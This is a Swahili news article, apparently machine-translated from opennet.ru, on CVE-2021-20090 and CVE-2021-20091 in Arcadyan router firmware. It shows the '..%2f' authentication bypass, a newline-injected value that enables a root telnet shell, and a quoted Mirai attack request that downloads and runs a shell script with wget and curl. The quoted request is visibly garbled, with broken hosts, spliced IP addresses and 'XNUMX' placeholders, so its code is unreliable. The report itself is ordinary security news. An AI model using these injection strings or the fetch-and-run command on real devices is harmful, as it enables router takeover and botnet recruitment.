Shambulio kubwa limerekodiwa kwenye mtandao dhidi ya vipanga njia vya nyumbani ambavyo programu dhibiti yake hutumia utekelezaji wa seva ya HTTP kutoka kwa kampuni ya Arcadyan. Ili kupata udhibiti wa vifaa, mchanganyiko wa athari mbili hutumiwa ambayo inaruhusu utekelezaji wa mbali wa msimbo wa kiholela wenye haki za mizizi. Tatizo linaathiri anuwai ya vipanga njia vya ADSL kutoka Arcadyan, ASUS na Buffalo, pamoja na vifaa vinavyotolewa chini ya chapa za Beeline (tatizo limethibitishwa katika Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone na waendeshaji wengine wa mawasiliano ya simu. Imeelezwa kuwa tatizo limekuwepo katika firmware ya Arcadyan kwa zaidi ya miaka 10 na wakati huu imeweza kuhamia angalau mifano 20 ya kifaa kutoka kwa wazalishaji 17 tofauti.
Athari ya kwanza, CVE-2021-20090, huwezesha kufikia hati yoyote ya kiolesura cha wavuti bila uthibitishaji. Kiini cha athari ni kwamba katika kiolesura cha wavuti, baadhi ya saraka ambapo picha, faili za CSS na hati za JavaScript hutumwa zinaweza kufikiwa bila uthibitishaji. Katika kesi hii, saraka ambazo ufikiaji bila uthibitishaji unaruhusiwa huangaliwa kwa kutumia mask ya awali. Kubainisha herufi "../" katika njia za kwenda kwenye saraka kuu kumezuiwa na programu dhibiti, lakini kutumia mchanganyiko wa "..%2f" kurukwa. Kwa hivyo, inawezekana kufungua kurasa zinazolindwa wakati wa kutuma maombi kama vile "http://192.168.1.1/images/..%2findex.htm".
Athari ya pili, CVE-2021-20091, inaruhusu mtumiaji aliyeidhinishwa kufanya mabadiliko kwenye mipangilio ya mfumo wa kifaa kwa kutuma vigezo vilivyoumbizwa mahususi kwa hati ya apply_abstract.cgi, ambayo haiangalii uwepo wa herufi mpya katika vigezo. . Kwa mfano, wakati wa kufanya operesheni ya ping, mshambuliaji anaweza kubainisha thamani "192.168.1.2%0AARC_SYS_TelnetdEnable=1" katika sehemu huku anwani ya IP ikikaguliwa, na hati, wakati wa kuunda faili ya mipangilio /tmp/etc/config/ .glbcfg, itaandika mstari "AARC_SYS_TelnetdEnable=1" ndani yake ", ambayo inawasha seva ya telnetd, ambayo hutoa ufikiaji usio na kikomo wa ganda la amri na haki za mizizi. Vile vile, kwa kuweka parameta ya AARC_SYS, unaweza kutekeleza msimbo wowote kwenye mfumo. Athari ya kwanza huwezesha kuendesha hati yenye matatizo bila uthibitishaji kwa kuipata kama β/images/..%2fapply_abstract.cgiβ.
Ili kutumia udhaifu, mshambulizi lazima aweze kutuma ombi kwa lango la mtandao ambalo kiolesura cha wavuti kinatumia. Kwa kuzingatia mienendo ya kuenea kwa shambulio hilo, waendeshaji wengi huacha ufikiaji kwenye vifaa vyao kutoka kwa mtandao wa nje ili kurahisisha utambuzi wa shida na huduma ya usaidizi. Ikiwa ufikiaji wa kiolesura ni mdogo tu kwa mtandao wa ndani, shambulio linaweza kufanywa kutoka kwa mtandao wa nje kwa kutumia mbinu ya "DNS rebinding". Athari za kiusalama tayari zinatumika kuunganisha vipanga njia kwa Mirai botnet: POST /images/..%2fapply_abstract.cgi Muunganisho wa HTTP/1.1: funga Wakala wa Mtumiaji: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_ping0_ipad. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Chanzo: opennet.ru